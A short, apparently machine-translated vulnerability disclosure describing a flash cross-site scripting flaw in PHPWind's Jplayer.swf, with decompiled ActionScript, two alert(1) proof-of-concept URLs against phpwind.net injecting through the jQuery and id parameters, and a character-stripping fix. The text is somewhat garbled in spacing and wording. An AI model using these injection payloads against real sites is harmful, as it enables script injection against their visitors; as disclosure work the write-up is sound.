PHPWind uses a lot of flash files. 1. Vulnerability files: http://www.phpwind.net/res/js/dev/util_libs/jPlayer/Jplayer.swf 2. Check the code after decompiling: this. jQuery = (loaderInfo. parameters. jQuery + "('#") + loaderInfo. parameters. id) + "'). jPlayer ");...... Private function init (_ arg1: TimerEvent): void {this. myInitTimer. stop (); if (ExternalInterface. available ){...... ExternalInterface. call (this. jQuery, "jPlayerFlashEvent", JplayerEvent. JPLAYER_READY, this. extractStatusData (this. commonStatus) ;};}www.2cto. com3. We can see that in the above Code, the jQuery variable is named by loaderInfo. parameters. jQuery and loaderInfo. parameters. id. call. 4. You can construct two POC files as follows, so there are two xss files: http://www.phpwind.net/res/js/dev/util_libs/jPlayer/Jplayer.swf ? JQuery = alert (1)} catch (e ){}// http://www.phpwind.net/res/js/dev/util_libs/jPlayer/Jplayer.swf ? Id = ')} catch (e) {alert (1)} // proof of vulnerability: http://www.phpwind.net/res/js/dev/util_libs/jPlayer/Jplayer.swf ? JQuery = alert (1)} catch (e ){}// http://www.phpwind.net/res/js/dev/util_libs/jPlayer/Jplayer.swf ? Id = ')} catch (e) {alert (1 )}//Solution:You can refer to swfupload.swf that place the repair method, is to put non-a-zA-Z0-9 _ character replace is empty